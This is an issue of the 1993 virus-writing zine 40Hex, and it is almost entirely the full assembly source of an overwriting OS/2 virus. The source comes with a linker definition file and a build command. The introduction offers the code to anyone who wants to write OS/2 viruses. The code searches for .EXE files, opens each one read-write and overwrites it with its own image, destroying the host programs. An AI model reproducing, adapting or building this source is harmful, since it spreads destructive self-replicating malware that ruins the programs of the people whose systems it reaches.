40hex12:(40HEX-12.009):04/12/1993 << Back To 40hex12

40Hex Number 12 Volume 3 Issue 3 File 009 This virus was given to us by Arthur Ellis, and is the first piece of OS/2 virus source that I have ever seen. Although it is only an overwriting virus, it should definately be helpful for anyone who wants to write viruses in OS/2. ->GHeap -----------------------------<Os2Vir1.Asm>------------------------------------- INCLUDE OS2.INC ; if you don't have OS2.INC, see end of this file COMMENT * This simple overwriting virus demonstrates how the OS/2 API functions are used to search for, open, and infect programs. No extended registers are used, and the program may be assembled with MASM 5.1 or 6.0, TASM for OS/2 (from the Borland C++ package), or with IBM Macro Assembler/2. Link with :link386 /exepack virus,,,c:\os2\doscalls,virus.def VIRUS.DEF: NAME VIRUS WINDOWCOMPAT PROTMODE STACKSIZE 8192 There is minimal error checking (since when do viruses check errors?). A useful project for a student would be to convert this program to .386p mode. - Arthur Ellis, 1993 * PrintIt MACRO string, StrLen push 1 ; stdout handle push DS mov DX, OFFSET string ; string to write push DX xor CX,CX ; zero CX mov CL, [StrLen] ; string length push CX push DS push OFFSET Written ; bytes written variable call DosWrite ; like int 21/40 ENDM OpenIt MACRO seg, handle, mode ; SEGMENT, open mode, handle push seg ; SEGMENT of file name push BX ; OFFSET of file name push DS ; SEGMENT of handle push OFFSET handle ; OFFSET of handle push DS ; SEGMENT of open action push OFFSET OpenAction ; OFFSET of open action push 0 ; file size DWORD push 0 ; file size DWORD push 3 ; attributes: hid,r-o,norm push 1 ; FILE_OPEN push mode ; OPEN_SHARE_DENYNONE push 0 ; DWORD 0 (reserved) push 0 ; DWORD 0 (reserved) Call DosOpen ; like int 21/3D ENDM .286p STACK SEGMENT PARA STACK 'STACK' DW 1000h STACK ENDS DGROUP GROUP _DATA, STACK ASSUME CS:_TEXT, DS:DGROUP, SS:DGROUP, ES:DGROUP _DATA SEGMENT WORD PUBLIC 'DATA' FileSpec DB '*.EXE', 0 OpenErr DB ' <Error opening file>',13,10,27,'[m' Hello DB 27,'[2J',27,'[1;36mMy name is ' Infected DB ' --> infected' CRLF DB 13,10,27,'[m' Written DW ? ; bytes written MyHandle DW ? ; virus handle VicHandle DW ? ; victim handle OpenAction DW ? ; open result Buf FileFindBuf <> ; file find structure MySize DW ? ; virus length EnvSeg DW ? ; selector for environment CmdOfs DW ? ; OFFSET of command line Image DB 2000 dup (?) ; virus image ImageLen DW ? ; length of virus DirHandle DW -1 ; directory handle SrchCount DW 1 ; search count _DATA ENDS _TEXT SEGMENT WORD PUBLIC 'CODE' extrn DOSCLOSE:far, DOSEXIT:far, DOSWRITE:far, DOSGETENV:far extrn DOSFINDCLOSE:far, DOSFINDFIRST:far, DOSFINDNEXT:far extrn DOSOPEN:far, DOSREAD:far main PROC far start: call GetName ; get the virus filename OpenIt ES, MyHandle, 40h ; open virus for read ;-------------------------------------------------------------------- ;---( Read virus to image buffer )----------------------------------- ;-------------------------------------------------------------------- push MyHandle ; handle for this program push DS ; buffer for file image push OFFSET Image push 2000 ; Could use DosQFileInfo to ; get filesize but this works push DS push OFFSET ImageLen ; virus length goes here call DosRead ; like int 21/3F ;-------------------------------------------------------------------- ;---( Find files to infect )----------------------------------------- ;-------------------------------------------------------------------- call FindIt ; find first file found: or AX, AX ; error? jz NoErr ; no error quit: push 1 ; terminate all threads push 0 ; return code call DosExit ; like int 21/4C NoErr: cmp word ptr SrchCount, 0 ; no files found? jz quit ; none found PrintIt Buf.findbuf_achname,Buf.findbuf_cchName ; display filename found ;-------------------------------------------------------------------- ;---( Write virus )-------------------------------------------------- ;-------------------------------------------------------------------- lea BX,Buf.findbuf_achName ; filename OFFSET in BX OpenIt DS, VicHandle, 42 ; ACCESS_READWRITE|SHAREDENYNONE or AX,AX ; error? jz proceed PrintIt OpenErr, 25 ; error on open jmp CloseIt proceed: PrintIt Infected,15 ; add to hit list mov BX,[VicHandle] push [VicHandle] ; write to found file push DS push OFFSET Image ; string to write push [ImageLen] ; image length push DS push OFFSET Written ; bytes written variable call DosWrite ; write the virus CloseIt: push [VicHandle] ; prepare to close call DosClose ; close file ;-------------------------------------------------------------------- ;---( Find next file )----------------------------------------------- ;-------------------------------------------------------------------- push DirHandle ; Directory Handle push DS ; SEGMENT of buffer push OFFSET Buf ; OFFSET of buffer push SIZE Buf ; length of buffer push DS ; SEGMENT of count push OFFSET SrchCount ; OFFSET of count call DosFindNext ; Find next file ; like int 21/4F jmp found ; infect if found else exit main ENDP ;-------------------------------------------------------------------- ;---( Get virus file name from environment )------------------------- ;-------------------------------------------------------------------- GetName PROC near push ds push OFFSET EnvSeg push ds push OFFSET CmdOfs call DosGetEnv ; get seg, ofs of command line mov ES,EnvSeg ; ES:BX holds command line mov BX,CmdOfs xor DI,DI xor AL,AL mov CX,-1 cld scan: repne scasb ; scan for double null scasb jne scan ; loop if single null mov BX,DI ; program name address mov CX,-1 ; find length repne scasb ; scan for null byte not CX ; convert CX to length dec CX mov [MySize],CX ; return length PrintIt Hello, 22 push 1 ; stdout handle push ES ; segment for command line push BX ; OFFSET of program name push [MySize] ; length of program name push DS push OFFSET Written ; bytes written variable call DosWrite ; like int 21/40 PrintIt CRLF,5 ret GetName ENDP ;-------------------------------------------------------------------- ;---( Find first victim )-------------------------------------------- ;-------------------------------------------------------------------- FindIt PROC near push DS push OFFSET FileSpec push SS ; SEGMENT of directory handle lea AX, DirHandle ; OFFSET of directory handle push AX push 07h ; attribute push DS ; SEGMENT of buffer push OFFSET Buf ; OFFSET of buffer push SIZE Buf ; length of buffer push DS ; SEGMENT of search count lea AX, SrchCount ; OFFSET of search count push AX push 0 ; Reserved push 0 call DosFindFirst ; Find first file ret ; like int 21/4E FindIt ENDP ;-------------------------------------------------------------------- _TEXT ENDS END start ;-------------------------------------------------------------------- ;--( FTIME structure from OS2.INC )---------------------------------- ;-------------------------------------------------------------------- ;FTIME STRUC ; ftime_fs DW ? ;FTIME ENDS ;ftime_twosecs EQU 01fh ;ftime_minutes EQU 07e0h ;ftime_hours EQU 0f800h ;-------------------------------------------------------------------- ;--( FDATE structure from OS2.INC )---------------------------------- ;-------------------------------------------------------------------- ;FDATE STRUC ; fdate_fs DW ? ;FDATE ENDS ;fdate_day EQU 01fh ;fdate_month EQU 01e0h ;fdate_year EQU 0fe00h ;-------------------------------------------------------------------- ;--( FileFindBuf structure from OS2.INC )---------------------------- ;-------------------------------------------------------------------- ;FILEFINDBUF STRUC ;findbuf_fdateCreation DB SIZE FDATE DUP (?) ;findbuf_ftimeCreation DB SIZE FTIME DUP (?) ;findbuf_fdateLastAccess DB SIZE FDATE DUP (?) ;findbuf_ftimeLastAccess DB SIZE FTIME DUP (?) ;findbuf_fdateLastWrite DB SIZE FDATE DUP (?) ;findbuf_ftimeLastWrite DB SIZE FTIME DUP (?) ;findbuf_cbFile DD ? ;findbuf_cbFileAlloc DD ? ;findbuf_attrFile DW ? ;findbuf_cchName DB ? ;findbuf_achName DB 256 DUP (?) ;FILEFINDBUF ENDS ;--------------------------------------------------------------------- -----------------------------<Virus.Def>---------------------------------------- NAME VIRUS WINDOWCOMPAT PROTMODE STACKSIZE 8192 -----------------------------<DoIt.Cmd>----------------------------------------- masm /Zi %1; link386 /exepack %1,,,c:\os2\doscalls,virus.def